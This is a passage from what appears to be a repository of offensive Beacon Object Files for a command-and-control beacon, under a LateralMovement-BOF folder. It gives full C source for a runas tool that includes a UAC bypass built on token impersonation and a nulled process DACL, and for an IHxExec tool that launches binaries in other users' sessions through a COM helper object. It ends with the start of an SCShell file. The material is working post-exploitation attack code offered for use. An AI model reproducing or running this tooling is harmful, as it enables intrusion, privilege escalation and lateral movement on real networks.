    //     BeaconPrintf(CALLBACK_OUTPUT, "Binary file deleted");
    // }
    //
    // BeaconPrintf(CALLBACK_OUTPUT, "Execution complete");
}

================================================
FILE: LateralMovement-BOF/runas/runas.c
================================================
#include <windows.h>
#include "beacon.h"

#define LOGON_WITH_PROFILE          0x00000001
#define LOGON_NETCREDENTIALS_ONLY   0x00000002
#define CREATE_NO_WINDOW            0x08000000
#define CREATE_UNICODE_ENVIRONMENT  0x00000400
#define STARTF_USESTDHANDLES        0x00000100
#define BUFFER_SIZE_PIPE            1048576
#define PROCESS_TIMEOUT             120000

#define SE_KERNEL_OBJECT            6
#define DACL_SECURITY_INFORMATION   0x00000004

#define SECURITY_MANDATORY_MEDIUM_RID   0x2000
#define SE_GROUP_INTEGRITY              0x00000020

WINBASEAPI WINBOOL WINAPI ADVAPI32$LogonUserW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINADVAPI  WINBOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINADVAPI  WINBOOL WINAPI ADVAPI32$SetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength);
WINBASEAPI HANDLE  WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI LPVOID  WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI BOOL    WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
WINBASEAPI BOOL    WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI DWORD   WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI BOOL    WINAPI KERNEL32$CreatePipe(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);
WINBASEAPI BOOL    WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI BOOL    WINAPI KERNEL32$SetNamedPipeHandleState(HANDLE hNamedPipe, LPDWORD lpMode, LPDWORD lpMaxCollectionCount, LPDWORD lpCollectDataTimeout);
WINBASEAPI BOOL    WINAPI KERNEL32$DuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
WINBASEAPI HANDLE  WINAPI KERNEL32$GetCurrentProcess(VOID);
WINBASEAPI BOOL    WINAPI KERNEL32$PeekNamedPipe(HANDLE hNamedPipe, LPVOID lpBuffer, DWORD nBufferSize, LPDWORD lpBytesRead, LPDWORD lpTotalBytesAvail, LPDWORD lpBytesLeftThisMessage);
WINADVAPI  WINBOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINADVAPI  WINBOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE hToken);
WINADVAPI  WINBOOL WINAPI ADVAPI32$RevertToSelf(VOID);
WINADVAPI  DWORD   WINAPI ADVAPI32$SetSecurityInfo(HANDLE handle, DWORD ObjectType, DWORD SecurityInfo, PSID psidOwner, PSID psidGroup, PACL pDacl, PACL pSacl);
WINADVAPI  WINBOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINADVAPI  WINBOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD dwSubAuthority0, DWORD dwSubAuthority1, DWORD dwSubAuthority2, DWORD dwSubAuthority3, DWORD dwSubAuthority4, DWORD dwSubAuthority5, DWORD dwSubAuthority6, DWORD dwSubAuthority7, PSID* pSid);
WINADVAPI  PVOID   WINAPI ADVAPI32$FreeSid(PSID pSid);
WINADVAPI  PDWORD  WINAPI ADVAPI32$GetSidSubAuthority(PSID pSid, DWORD nSubAuthority);
WINADVAPI  PUCHAR  WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID pSid);
WINADVAPI  DWORD   WINAPI ADVAPI32$GetLengthSid(PSID pSid);
WINBASEAPI HANDLE  WINAPI KERNEL32$GetCurrentThread(VOID);
WINADVAPI  WINBOOL WINAPI ADVAPI32$OpenThreadToken(HANDLE ThreadHandle, DWORD DesiredAccess, BOOL OpenAsSelf, PHANDLE TokenHandle);
WINADVAPI  WINBOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE hExistingToken, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpTokenAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, PHANDLE phNewToken);

void _memset(void* ptr, int value, size_t num) {
    if (!ptr) return;
    unsigned char* p = (unsigned char*)ptr;
    while (num--) *p++ = (unsigned char)value;
}

const char* GetLogonTypeName(DWORD logonType)
{
    switch (logonType) {
        case 2:  return "Interactive";
        case 3:  return "Network";
        case 4:  return "Batch";
        case 5:  return "Service";
        case 8:  return "NetworkCleartext";
        case 9:  return "NewCredentials";
        default: return "Unknown";
    }
}

BOOL CreateAnonymousPipe(PHANDLE hReadPipe, PHANDLE hWritePipe)
{
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    return KERNEL32$CreatePipe(hReadPipe, hWritePipe, &sa, BUFFER_SIZE_PIPE);
}

DWORD GetTokenIntegrityLevel(HANDLE hToken)
{
    DWORD integrityLevel = 0;
    DWORD dwLength = 0;
    PTOKEN_MANDATORY_LABEL pTIL = NULL;

    ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength);
    if (dwLength == 0) return 0;

    pTIL = (PTOKEN_MANDATORY_LABEL)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLength);
    if (!pTIL) return 0;

    if (ADVAPI32$GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) {
        PUCHAR pCount = ADVAPI32$GetSidSubAuthorityCount(pTIL->Label.Sid);
        if (pCount && *pCount > 0) {
            PDWORD pRid = ADVAPI32$GetSidSubAuthority(pTIL->Label.Sid, (*pCount) - 1);
            if (pRid) integrityLevel = *pRid;
        }
    }

    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTIL);
    return integrityLevel;
}

BOOL SetTokenIntegrityLevel(HANDLE hToken, DWORD integrityLevel)
{
    SID_IDENTIFIER_AUTHORITY MLAuthority = { {0, 0, 0, 0, 0, 16} };
    PSID pIntegritySid = NULL;
    TOKEN_MANDATORY_LABEL tml;
    BOOL result = FALSE;

    if (!ADVAPI32$AllocateAndInitializeSid(&MLAuthority, 1, integrityLevel, 0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
        return FALSE;

    _memset(&tml, 0, sizeof(tml));
    tml.Label.Sid = pIntegritySid;
    tml.Label.Attributes = SE_GROUP_INTEGRITY;

    result = ADVAPI32$SetTokenInformation(hToken, TokenIntegrityLevel, &tml, sizeof(TOKEN_MANDATORY_LABEL));

    ADVAPI32$FreeSid(pIntegritySid);
    return result;
}

BOOL CreateProcessWithLogonWBypassUac(LPCWSTR username, LPCWSTR domain, LPCWSTR password, DWORD logonType, LPWSTR cmdLine, LPSTARTUPINFOW si, LPPROCESS_INFORMATION pi)
{
    HANDLE hToken = NULL;
    HANDLE hCurrentProcessToken = NULL;
    BOOL result = FALSE;

    if (!ADVAPI32$LogonUserW(username, domain, password, logonType, LOGON32_PROVIDER_DEFAULT, &hToken)) {
        BeaconPrintf(CALLBACK_ERROR, "BypassUac: LogonUser failed. Error: %d\n", KERNEL32$GetLastError());
        return FALSE;
    }

    if (ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &hCurrentProcessToken)) {
        DWORD currentIL = GetTokenIntegrityLevel(hCurrentProcessToken);
        SetTokenIntegrityLevel(hToken, currentIL);
        KERNEL32$CloseHandle(hCurrentProcessToken);
    }

    ADVAPI32$SetSecurityInfo(KERNEL32$GetCurrentProcess(), SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, NULL, NULL);

    if (ADVAPI32$ImpersonateLoggedOnUser(hToken)) {
        LPCWSTR effectiveDomain = domain;
        WCHAR dotDomain[] = L".";
        if (!domain || domain[0] == L'\0')
            effectiveDomain = dotDomain;

        WCHAR currentDir[] = L"C:\\Windows\\System32";
        result = ADVAPI32$CreateProcessWithLogonW(username, effectiveDomain, password, LOGON_NETCREDENTIALS_ONLY, NULL, cmdLine, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, currentDir, si, pi);
        
        if (!result)
            BeaconPrintf(CALLBACK_ERROR, "BypassUac: CreateProcessWithLogonW failed. Error: %d\n", KERNEL32$GetLastError());
        
        ADVAPI32$RevertToSelf();
    }
    else {
        BeaconPrintf(CALLBACK_ERROR, "BypassUac: ImpersonateLoggedOnUser failed. Error: %d\n", KERNEL32$GetLastError());
    }

    KERNEL32$CloseHandle(hToken);
    return result;
}

VOID go(IN PCHAR Buffer, IN ULONG Length)
{
    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    
    ULONG  cmdLen      = 0;
    WCHAR* username    = (WCHAR*)BeaconDataExtract(&parser, NULL);
    WCHAR* password    = (WCHAR*)BeaconDataExtract(&parser, NULL);
    WCHAR* domain      = (WCHAR*)BeaconDataExtract(&parser, NULL);
    WCHAR* commandLine = (WCHAR*)BeaconDataExtract(&parser, &cmdLen);
    ULONG  logonType   = BeaconDataInt(&parser);
    ULONG  timeout     = BeaconDataInt(&parser);
    ULONG  noOutput    = BeaconDataInt(&parser);
    ULONG  bypassUac   = BeaconDataInt(&parser);

    if (!username || !password || !domain) {
        BeaconPrintf(CALLBACK_ERROR, "Missing required parameters: username, password, or domain\n");
        return;
    }

    if (!commandLine || cmdLen == 0) {
        BeaconPrintf(CALLBACK_ERROR, "Missing required parameter: commandLine\n");
        return;
    }

    DWORD logonFlags = LOGON_WITH_PROFILE;
    if (logonType == 9)
        logonFlags = LOGON_NETCREDENTIALS_ONLY;
    else if (logonType < 2 || logonType > 9 || logonType == 6 || logonType == 7)
        logonType = 2;

    HANDLE hOutputReadTmp = NULL;
    HANDLE hOutputWrite = NULL;
    HANDLE hErrorWrite = NULL;
    HANDLE hOutputRead = NULL;
    HANDLE hCurrentProcess = KERNEL32$GetCurrentProcess();

    if (!noOutput) {
        if (!CreateAnonymousPipe(&hOutputReadTmp, &hOutputWrite)) {
            BeaconPrintf(CALLBACK_ERROR, "CreatePipe for stdout failed. Error: %d\n", KERNEL32$GetLastError());
            return;
        }

        if (!KERNEL32$DuplicateHandle(hCurrentProcess, hOutputWrite, hCurrentProcess, &hErrorWrite, 0, TRUE, DUPLICATE_SAME_ACCESS)) {
            BeaconPrintf(CALLBACK_ERROR, "DuplicateHandle for stderr failed. Error: %d\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hOutputReadTmp);
            KERNEL32$CloseHandle(hOutputWrite);
            return;
        }

        if (!KERNEL32$DuplicateHandle(hCurrentProcess, hOutputReadTmp, hCurrentProcess, &hOutputRead, 0, FALSE, DUPLICATE_SAME_ACCESS)) {
            BeaconPrintf(CALLBACK_ERROR, "DuplicateHandle for stdout read failed. Error: %d\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hOutputReadTmp);
            KERNEL32$CloseHandle(hOutputWrite);
            KERNEL32$CloseHandle(hErrorWrite);
            return;
        }
        KERNEL32$CloseHandle(hOutputReadTmp);
        hOutputReadTmp = NULL;

        DWORD pipeMode = PIPE_NOWAIT;
        KERNEL32$SetNamedPipeHandleState(hOutputRead, &pipeMode, NULL, NULL);
    }

    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    _memset(&si, 0, sizeof(si));
    _memset(&pi, 0, sizeof(pi));
    si.cb = sizeof(si);
    
    if (!noOutput) {
        si.dwFlags = STARTF_USESTDHANDLES;
        si.hStdInput = NULL;
        si.hStdOutput = hOutputWrite;
        si.hStdError = hErrorWrite;
    }

    WCHAR* cmdLineCopy = (WCHAR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (cmdLen + 2) * sizeof(WCHAR));
    if (!cmdLineCopy) {
        BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory for command line\n");
        if (!noOutput) {
            KERNEL32$CloseHandle(hOutputRead);
            KERNEL32$CloseHandle(hOutputWrite);
            KERNEL32$CloseHandle(hErrorWrite);
        }
        return;
    }
    
    for (ULONG i = 0; i < cmdLen / sizeof(WCHAR); i++)
        cmdLineCopy[i] = commandLine[i];

    BOOL processCreated = FALSE;

    WCHAR currentDir[] = L"C:\\Windows\\System32";

    if (bypassUac) {
        DWORD logonTypeBypassUac = logonType;
        if (logonType != 3 && logonType != 4 && logonType != 5 && logonType != 8)
            logonTypeBypassUac = 8;
        processCreated = CreateProcessWithLogonWBypassUac(username, domain, password, logonTypeBypassUac, cmdLineCopy, &si, &pi);
    }
    else {
        processCreated = ADVAPI32$CreateProcessWithLogonW(username, domain, password, logonFlags, NULL, cmdLineCopy, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, currentDir, &si, &pi);
    }

    if (!noOutput) {
        KERNEL32$CloseHandle(hOutputWrite);
        KERNEL32$CloseHandle(hErrorWrite);
        hOutputWrite = NULL;
        hErrorWrite = NULL;
    }

    if (!processCreated) {
        DWORD error = KERNEL32$GetLastError();
        BeaconPrintf(CALLBACK_ERROR, "CreateProcessWithLogonW failed. Error: %d\n", error);
        if (!noOutput) KERNEL32$CloseHandle(hOutputRead);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, cmdLineCopy);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Process created (PID: %d) as %ls\\%ls (logon: %s)%s\n", pi.dwProcessId, domain, username, GetLogonTypeName(logonType), bypassUac ? " [bypass-uac]" : "");

    if (!noOutput) {
        DWORD waitTime = (timeout > 0) ? timeout : PROCESS_TIMEOUT;
        KERNEL32$WaitForSingleObject(pi.hProcess, waitTime);

        char* outputBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, BUFFER_SIZE_PIPE);
        if (outputBuffer) {
            DWORD totalBytesRead = 0;
            DWORD bytesRead = 0;
            DWORD bytesAvail = 0;

            while (KERNEL32$PeekNamedPipe(hOutputRead, NULL, 0, NULL, &bytesAvail, NULL) && bytesAvail > 0) {
                DWORD toRead = (bytesAvail > (BUFFER_SIZE_PIPE - totalBytesRead - 1)) ? (BUFFER_SIZE_PIPE - totalBytesRead - 1) : bytesAvail;
                if (toRead == 0)
                    break;
                if (KERNEL32$ReadFile(hOutputRead, outputBuffer + totalBytesRead, toRead, &bytesRead, NULL))
                    totalBytesRead += bytesRead;
                else
                    break;
            }

            if (totalBytesRead > 0) {
                outputBuffer[totalBytesRead] = '\0';
                BeaconPrintf(CALLBACK_OUTPUT_OEM, "\n--- Process Output ---\n%s\n--- End Output ---\n", outputBuffer);
            }
            else {
                BeaconPrintf(CALLBACK_OUTPUT, "[*] No output captured from the process.\n");
            }

            _memset(outputBuffer, 0, BUFFER_SIZE_PIPE);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, outputBuffer);
        }

        KERNEL32$CloseHandle(hOutputRead);
    }

    KERNEL32$CloseHandle(pi.hProcess);
    KERNEL32$CloseHandle(pi.hThread);
    
    _memset(cmdLineCopy, 0, (cmdLen + 2) * sizeof(WCHAR));
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, cmdLineCopy);
}

================================================
FILE: LateralMovement-BOF/runas_sess_IHxExec/bofdefs.h
================================================
/*
 * BOF Definitions and Dynamic Function Resolution
 * IHxExec-BOF - Cross-Session Execution via COM
 */

#ifndef _BOFDEFS_H_
#define _BOFDEFS_H_

#include <windows.h>
#include "beacon.h"

/* ============================================================================
 * Dynamic Function Resolution for BOF
 * ============================================================================ */

#ifdef BOF

/* OLE32.dll - COM Functions */
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
DECLSPEC_IMPORT void    WINAPI OLE32$CoUninitialize(void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*);

/* KERNEL32.dll */
DECLSPEC_IMPORT int     WINAPI KERNEL32$MultiByteToWideChar(UINT, DWORD, LPCCH, int, LPWSTR, int);
DECLSPEC_IMPORT void*   WINAPI KERNEL32$HeapAlloc(HANDLE, DWORD, SIZE_T);
DECLSPEC_IMPORT BOOL    WINAPI KERNEL32$HeapFree(HANDLE, DWORD, LPVOID);
DECLSPEC_IMPORT HANDLE  WINAPI KERNEL32$GetProcessHeap(void);
DECLSPEC_IMPORT DWORD   WINAPI KERNEL32$GetLastError(void);

/* MSVCRT.dll */
DECLSPEC_IMPORT size_t  __cdecl MSVCRT$wcslen(const wchar_t*);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscpy(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscat(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT int     __cdecl MSVCRT$wcsncmp(const wchar_t*, const wchar_t*, size_t);
DECLSPEC_IMPORT void*   __cdecl MSVCRT$memset(void*, int, size_t);

/* Macros for cleaner code */
#define CoInitializeEx      OLE32$CoInitializeEx
#define CoUninitialize      OLE32$CoUninitialize
#define CoCreateInstance    OLE32$CoCreateInstance
#define MultiByteToWideChar KERNEL32$MultiByteToWideChar
#define HeapAlloc           KERNEL32$HeapAlloc
#define HeapFree            KERNEL32$HeapFree
#define GetProcessHeap      KERNEL32$GetProcessHeap
#define GetLastError        KERNEL32$GetLastError
#define wcslen              MSVCRT$wcslen
#define wcscpy              MSVCRT$wcscpy
#define wcscat              MSVCRT$wcscat
#define wcsncmp             MSVCRT$wcsncmp
#define memset              MSVCRT$memset

#else /* Non-BOF compilation */

#pragma comment(lib, "ole32.lib")

#endif /* BOF */

/* ============================================================================
 * COM GUIDs for IHxExec
 * ============================================================================ */

// CLSID_IHxHelpPaneServer: {8cec58ae-07a1-11d9-b15e-000d56bfe6ee}
static const GUID CLSID_IHxHelpPaneServer = {
    0x8cec58ae, 0x07a1, 0x11d9, { 0xb1, 0x5e, 0x00, 0x0d, 0x56, 0xbf, 0xe6, 0xee }
};

// IID_IHxHelpPaneServer: {8cec592c-07a1-11d9-b15e-000d56bfe6ee}
static const GUID IID_IHxHelpPaneServer = {
    0x8cec592c, 0x07a1, 0x11d9, { 0xb1, 0x5e, 0x00, 0x0d, 0x56, 0xbf, 0xe6, 0xee }
};

// CLSID_ComActivator (Standard COM Activator): {0000033C-0000-0000-C000-000000000046}
static const GUID CLSID_ComActivator = {
    0x0000033C, 0x0000, 0x0000, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }
};

// IID_IStandardActivator: {000001b8-0000-0000-C000-000000000046}
static const GUID IID_IStandardActivator = {
    0x000001b8, 0x0000, 0x0000, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }
};

// IID_ISpecialSystemProperties: {000001b9-0000-0000-C000-000000000046}
static const GUID IID_ISpecialSystemProperties = {
    0x000001b9, 0x0000, 0x0000, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }
};

/* ============================================================================
 * COM Interface: IHxHelpPaneServer
 * ============================================================================ */

typedef struct IHxHelpPaneServerVtbl {
    // IUnknown
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(void* This, REFIID riid, void** ppvObject);
    ULONG   (STDMETHODCALLTYPE *AddRef)(void* This);
    ULONG   (STDMETHODCALLTYPE *Release)(void* This);
    // IHxHelpPaneServer
    HRESULT (STDMETHODCALLTYPE *DisplayTask)(void* This, LPWSTR pwszTask);
    HRESULT (STDMETHODCALLTYPE *DisplayContents)(void* This, LPWSTR pwszContents);
    HRESULT (STDMETHODCALLTYPE *DisplaySearchResults)(void* This, LPWSTR pwszSearch);
    HRESULT (STDMETHODCALLTYPE *Execute)(void* This, LPCWSTR pwszUrl);
} IHxHelpPaneServerVtbl;

typedef struct IHxHelpPaneServer {
    IHxHelpPaneServerVtbl* lpVtbl;
} IHxHelpPaneServer;

/* ============================================================================
 * COM Interface: IStandardActivator
 * ============================================================================ */

typedef struct IStandardActivatorVtbl {
    // IUnknown
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(void* This, REFIID riid, void** ppvObject);
    ULONG   (STDMETHODCALLTYPE *AddRef)(void* This);
    ULONG   (STDMETHODCALLTYPE *Release)(void* This);
    // IStandardActivator
    HRESULT (STDMETHODCALLTYPE *StandardGetClassObject)(
        void* This, REFCLSID rclsid, DWORD dwClsCtx, COSERVERINFO* pServerInfo,
        REFIID riid, void** ppvClassObj);
    HRESULT (STDMETHODCALLTYPE *StandardCreateInstance)(
        void* This, REFCLSID rclsid, IUnknown* punkOuter, DWORD dwClsCtx,
        COSERVERINFO* pServerInfo, DWORD dwCount, MULTI_QI* pResults);
    HRESULT (STDMETHODCALLTYPE *StandardGetInstanceFromFile)(
        void* This, COSERVERINFO* pServerInfo, CLSID* pclsidOverride,
        IUnknown* punkOuter, DWORD dwClsCtx, DWORD grfMode, OLECHAR* pwszName,
        DWORD dwCount, MULTI_QI* pResults);
    HRESULT (STDMETHODCALLTYPE *StandardGetInstanceFromIStorage)(
        void* This, COSERVERINFO* pServerInfo, CLSID* pclsidOverride,
        IUnknown* punkOuter, DWORD dwClsCtx, IStorage* pstg,
        DWORD dwCount, MULTI_QI* pResults);
    HRESULT (STDMETHODCALLTYPE *Reset)(void* This);
} IStandardActivatorVtbl;

typedef struct IStandardActivator {
    IStandardActivatorVtbl* lpVtbl;
} IStandardActivator;

/* ============================================================================
 * COM Interface: ISpecialSystemProperties
 * ============================================================================ */

typedef struct ISpecialSystemPropertiesVtbl {
    // IUnknown
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(void* This, REFIID riid, void** ppvObject);
    ULONG   (STDMETHODCALLTYPE *AddRef)(void* This);
    ULONG   (STDMETHODCALLTYPE *Release)(void* This);
    // ISpecialSystemProperties
    HRESULT (STDMETHODCALLTYPE *SetSessionId)(void* This, ULONG dwSessionId, BOOL bUseConsole, BOOL fRemoteThisSessionId);
    HRESULT (STDMETHODCALLTYPE *GetSessionId)(void* This, ULONG* pdwSessionId, BOOL* pbUseConsole);
    HRESULT (STDMETHODCALLTYPE *GetSessionId2)(void* This, ULONG* pdwSessionId, BOOL* pbUseConsole, BOOL* pfRemoteThisSessionId);
    HRESULT (STDMETHODCALLTYPE *SetClientImpersonating)(void* This, BOOL fClientImpersonating);
    HRESULT (STDMETHODCALLTYPE *GetClientImpersonating)(void* This, BOOL* pfClientImpersonating);
    HRESULT (STDMETHODCALLTYPE *SetPartitionId)(void* This, REFGUID guidPartitionId);
    HRESULT (STDMETHODCALLTYPE *GetPartitionId)(void* This, GUID* pguidPartitionId);
    HRESULT (STDMETHODCALLTYPE *SetProcessRequestType)(void* This, DWORD dwProcessRequestType);
    HRESULT (STDMETHODCALLTYPE *GetProcessRequestType)(void* This, DWORD* pdwProcessRequestType);
    HRESULT (STDMETHODCALLTYPE *SetOrigClsctx)(void* This, DWORD dwOrigClsctx);
    HRESULT (STDMETHODCALLTYPE *GetOrigClsctx)(void* This, DWORD* pdwOrigClsctx);
    HRESULT (STDMETHODCALLTYPE *SetDefaultAuthenticationLevel)(void* This, DWORD dwDefaultAuthenticationLevel);
    HRESULT (STDMETHODCALLTYPE *GetDefaultAuthenticationLevel)(void* This, DWORD* pdwDefaultAuthenticationLevel);
} ISpecialSystemPropertiesVtbl;

typedef struct ISpecialSystemProperties {
    ISpecialSystemPropertiesVtbl* lpVtbl;
} ISpecialSystemProperties;

#endif /* _BOFDEFS_H_ */


================================================
FILE: LateralMovement-BOF/runas_sess_IHxExec/ihxexec.c
================================================
#include <windows.h>
#include "bofdefs.h"

LPWSTR EnsureFileProtocol(LPWSTR path) {
    const WCHAR* prefix = L"file:///";
    size_t prefixLen = wcslen(prefix);
    size_t pathLen = wcslen(path);

    // Check if already has file:/// prefix
    if (pathLen >= prefixLen && wcsncmp(path, prefix, prefixLen) == 0) {
        LPWSTR result = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (pathLen + 1) * sizeof(WCHAR));
        if (result) wcscpy(result, path);
        return result;
    }

    // Add prefix
    size_t newLen = prefixLen + pathLen + 1;
    LPWSTR result = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, newLen * sizeof(WCHAR));
    if (result == NULL) return NULL;

    wcscpy(result, prefix);
    wcscat(result, path);

    return result;
}

void go(char* args, int len) {
    datap   parser;
    DWORD   sessionId = 0;
    LPWSTR  wExecutablePath = NULL;
    LPWSTR  wFullUrl = NULL;
    HRESULT hr = S_OK;
    BOOL    comInitialized = FALSE;

    IStandardActivator*       pStdActivator = NULL;
    ISpecialSystemProperties* pSpecialProps = NULL;
    IHxHelpPaneServer*        pHxServer = NULL;

    BeaconDataParse(&parser, args, len);
    sessionId = BeaconDataInt(&parser);
    wExecutablePath = BeaconDataExtract(&parser, NULL);

    wFullUrl = EnsureFileProtocol(wExecutablePath);
    if (wFullUrl == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create URL");
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Cross-Session Execution");
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Target Session: %d", sessionId);
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Executable: %S", wFullUrl);

    /* Initialize COM */
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] CoInitializeEx failed: 0x%08X", hr);
        goto cleanup;
    }
    comInitialized = TRUE;

    /* Create IStandardActivator */
    hr = CoCreateInstance(
        &CLSID_ComActivator,
        NULL,
        CLSCTX_INPROC_SERVER,
        &IID_IStandardActivator,
        (void**)&pStdActivator
    );
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get IStandardActivator: 0x%08X", hr);
        goto cleanup;
    }

    /* Get ISpecialSystemProperties */
    hr = pStdActivator->lpVtbl->QueryInterface(
        pStdActivator,
        &IID_ISpecialSystemProperties,
        (void**)&pSpecialProps
    );
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get ISpecialSystemProperties: 0x%08X", hr);
        goto cleanup;
    }

    /* Set target session ID */
    hr = pSpecialProps->lpVtbl->SetSessionId(pSpecialProps, sessionId, FALSE, TRUE);
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set session ID: 0x%08X", hr);
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Session ID set to %d", sessionId);

    /* Create IHxHelpPaneServer in target session */
    MULTI_QI mqi[1];
    memset(mqi, 0, sizeof(mqi));
    mqi[0].pIID = &IID_IHxHelpPaneServer;
    mqi[0].pItf = NULL;
    mqi[0].hr = S_OK;

    hr = pStdActivator->lpVtbl->StandardCreateInstance(
        pStdActivator,
        &CLSID_IHxHelpPaneServer,
        NULL,
        CLSCTX_ALL,
        NULL,
        1,
        mqi
    );
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] StandardCreateInstance failed: 0x%08X", hr);
        goto cleanup;
    }
    if (FAILED(mqi[0].hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] MULTI_QI failed: 0x%08X", mqi[0].hr);
        goto cleanup;
    }

    pHxServer = (IHxHelpPaneServer*)mqi[0].pItf;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] IHxHelpPaneServer spawned in session %d", sessionId);

    /* Execute the binary */
    hr = pHxServer->lpVtbl->Execute(pHxServer, wFullUrl);
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Execute failed: 0x%08X", hr);
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] SUCCESS! Binary executed in session %d", sessionId);

cleanup:
    if (pHxServer)     pHxServer->lpVtbl->Release(pHxServer);
    if (pSpecialProps) pSpecialProps->lpVtbl->Release(pSpecialProps);
    if (pStdActivator) pStdActivator->lpVtbl->Release(pStdActivator);
    if (comInitialized) CoUninitialize();
    if (wFullUrl)       HeapFree(GetProcessHeap(), 0, wFullUrl);
}



================================================
FILE: LateralMovement-BOF/scshell/scshell.c
================================================
// Author: Mr.Un1k0d3r RingZer0 Team

#include <windows.h>
#include <stdio.h>
#include "beacon.h"

